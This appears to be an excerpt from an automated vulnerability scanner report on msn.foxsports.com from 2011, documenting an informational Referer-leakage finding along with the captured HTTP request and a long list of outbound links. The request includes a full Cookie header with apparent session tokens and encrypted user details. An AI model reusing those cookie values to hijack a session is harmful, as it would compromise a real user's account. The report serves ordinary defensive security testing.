<input type="password" name="user.fscomPassword" id="password" title="Password" onfocus="clearDefaultFormValues(this);"/>
<br />
...[SNIP]...

10. Cross-domain Referer leakage
There are 44 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://msn.foxsports.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?fb_xd_fragment HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://msn.foxsports.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Cookie: _gig_mig=1; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pRME=; pExternalUser=; pLMD="2011-01-08 00:30:34"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; pUID=/k94ON71KoD/EYqOMDzIDg==; 
glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; MUID=65AFF4B77A124856A6B4337A160FA285; _chartbeat2=oxy92bi233plhtq3; NetInsightSessionID=1
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Cache-Control: max-age=27
Date: Sat, 08 Jan 2011 00:41:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 296321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a href="http://www.foxsportsbracket.com/" title="VOTE: TOP MOMENT" >VOTE: TOP MOMENT</a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...



    <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all">Turns out Panthers have no Luck at all</a>
...[SNIP]...



            <a href="http://www.foxsportscarolinas.com/01/06/11/Carolinas-Outta-Luck/landing.html?blockID=386443&amp;feedID=3894" title="Turns out Panthers have no Luck at all"></a>
...[SNIP]...



    <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot">QB Pryor has surgery on foot</a>
...[SNIP]...



            <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU">
TCU billboard takes shot at OSU
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?">
Good hire?
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?"></a>
...[SNIP]...
<div class="subhead Rumors"><a href="http://www.yardbarker.com"><img src="/component/photo/BroughtToYouByYardbarker">
...[SNIP]...
<h3><a title="Can Elway return Denver to the glory days?" href="http://network.yardbarker.com/nfl/article_external/can_john_elway_return_denver_to_their_days_of_glory/3926452">Can Elway return Denver to the glory days?</a>
...[SNIP]...
<h3><a title="Report: Weis, Haley often screamed at each other" href="http://network.yardbarker.com/nfl/article_external/report_egotistical_charlie_weis_and_todd_haley_often_screamed_at_each_other/3925793">Report: Weis, Haley often screamed at each other</a>
...[SNIP]...
<h3><a title="Amare Stoudemire to cameo in final Entourage season" href="http://network.yardbarker.com/nba/article_external/amare_stoudemire_to_appear_in_final_entourage_season/3924657">Amare Stoudemire to cameo in final Entourage season</a>
...[SNIP]...
<div class="foot"><a title="MORE RUMORS" class="more" href="http://www.yardbarker.com/rumors">MORE RUMORS&nbsp;&raquo;</a>
...[SNIP]...
<td class="fs-promo-card-image" width="65">
                   <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd"><img alt="Gridiron Dynasty" border="0" src="/component/photo/Gridiron_Dynasty_65x48" />
...[SNIP]...
<strong><a href="http://www.whatifsports.com/x.asp?r=678106&u=gd">Gridiron Dynasty</a>
...[SNIP]...
<div>
                           <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd" target="_blank">PLAY NOW</a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
<h4 class="story-data" title="Bill Reiter">
                   
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-Road-Warrior-SW-PI_20110106211141407_196_100.JPG" class="story-image" width="196" height="100" alt="LeBron James (Phot
...[SNIP]...
</a>
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" class="story-blurb" title="Road warrior">
                           LeBron has been especially lethal away from Miami.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title="FOX SPORTS SOUTHWEST">
                   
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/gasleak-pi_20110106172942297_196_100.JPG" class="story-image" width="196" height="100" alt="Drew Brees, New Orleans Saints" t
...[SNIP]...
</a>
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" class="story-blurb" title="Gas leak">
                           Saints' high-octane aerial assault doesn't resemble last season's
juggernaut.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/shows/inside-call?vid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
